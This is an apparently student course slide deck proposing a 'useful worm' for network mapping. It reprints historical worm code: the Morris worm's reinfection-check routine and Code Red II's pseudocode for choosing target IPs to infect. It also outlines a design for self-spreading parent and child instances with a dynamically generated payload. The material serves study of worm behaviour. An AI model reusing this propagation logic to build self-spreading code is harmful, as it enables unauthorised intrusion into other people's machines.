Download - The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire
![Page 1: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/1.jpg)
The Worm Works For You
Matt Weaver
CS591
![Page 2: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/2.jpg)
Introduction
The Shockwave RiderPARC
Town Crier Vampire
![Page 3: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/3.jpg)
Goal
Use a worm to measure bandwidth and map a network.
Analyze classic worms. Morris Code Red
Determine the algorithm and architecture of a “useful worm”
![Page 4: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/4.jpg)
Morris Mistake
Listen on a port: failure leads to infection.Machines were reinfected.
![Page 5: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/5.jpg)
Morris checkother() /* 0x57d0 */ { int s, l8, l12, l16, optval; struct sockaddr_in sin; /* 16 bytes */ optval = 1; if ((random() % 7) == 3) return; /* 612 */ s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) return; /* Make a socket to the localhost, using a link-time specific port */ bzero(&sin, sizeof(sin)); /* 16 */ sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1")); /* <other_fd+4> */ sin.sin_port = 0x00005b3d; /* ??? */ if (connect(s, &sin, sizeof(sin)) < 0) { close(s); } else { l8 = MAGIC_2; /* Magic number??? */ if (write(s, &l8, sizeof(l8)) != sizeof(l8)) { close(s); return; } l8 = 0; if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) { close(s); return; } if (l8 != MAGIC_1) { close(s); return; }
l12 = random()/8; if (write(s, &l12, sizeof(l12)) != sizeof(l12)) { close(s); return; }
if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) { close(s); return; }
if (!((l12+l16) % 2)) pleasequit++; close(s); } sleep(5); s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) return; /* Set the socket so that the address may be reused */ setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval)); if (bind(s, &sin, sizeof(sin)) < 0) { close(s); return; } listen(s, 10); other_fd = s; return; }
![Page 6: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/6.jpg)
Code Red II
Mountain DewCode Red utilized a clever distribution
scheme: not just the random IP trick.
![Page 7: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/7.jpg)
Code Red II (Continued)
mtable[] = { 0xFFFFFFFF // go anywhere 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFFFF00 // stay in class A 0xFFFF0000 // stay in class B 0xFFFF0000 // stay in class B 0xFFFF0000 }; // stay in class B # start with a random number that will be our new IP address. # I presume the random number generator is "random enough". newip = random(); # zero the UPPER octets of the random IP, which means that the # random number won't participate in the class A or class B # address mask = mtable[ random() & 0x7 ]; // locate a mask newip &= mask; // throw away rightmost bits # flip the mask around to operate on LOWER octets mask = ~mask; // flip the mask around myip = LOCAL_IP & mask; // throw away leftmost bits # newip contains the upper bits # myip contains the lower bits # join them: newip |= myip; if (newip starts with 127) try again // localhost if (newip starts with 224) try again // multicast if (newip matches LOCAL_IP) try again Connect to "newip" and try to infect
![Page 8: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/8.jpg)
A New Worm
Root
Target
Target
Target
Target
Network
![Page 9: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/9.jpg)
Logic
Write a text file (C on Win ~ on Unix)
Talk to parent. Find next machine. Infect next. Talk to parent. Timed death. Forced death (success).
Parent Child Next Target
![Page 10: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/10.jpg)
Concerns
Running amok/re-infection.Termination
![Page 11: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/11.jpg)
The Root Machine
Compiles UDP payload information from child instances.
Maps network.Dynamically generate viral payload
(binary).Provide control values.
![Page 12: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/12.jpg)
Conclusion
Master’s Project: get it working safely.
![Page 13: The Worm Works For You Matt Weaver CS591. Introduction The Shockwave Rider PARC Town Crier Vampire](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d435503460f94a1f689/html5/thumbnails/13.jpg)
Sources
Aleph One. “Smashing the Stack for Fun and Profit”. Phrack 49.
CERT. http://www.cert.org/ Eren, Sinan. “Smashing the Kernel Stack for Fun and
Profit.” Phrack 60. Erickson, Jon. Hacking: The Art of Exploitation. No
Startch Press, 2003. Morris, Robert. Morris Worm Source Code.
http://www.foo.be/docs-free/morris-worm/worm/ Wikipedia, “Computer Worm”.
http://en.wikipedia.org/wiki/Computer_worm Wiedl, Steve. Unix Wiz. http://www.unixwiz.net/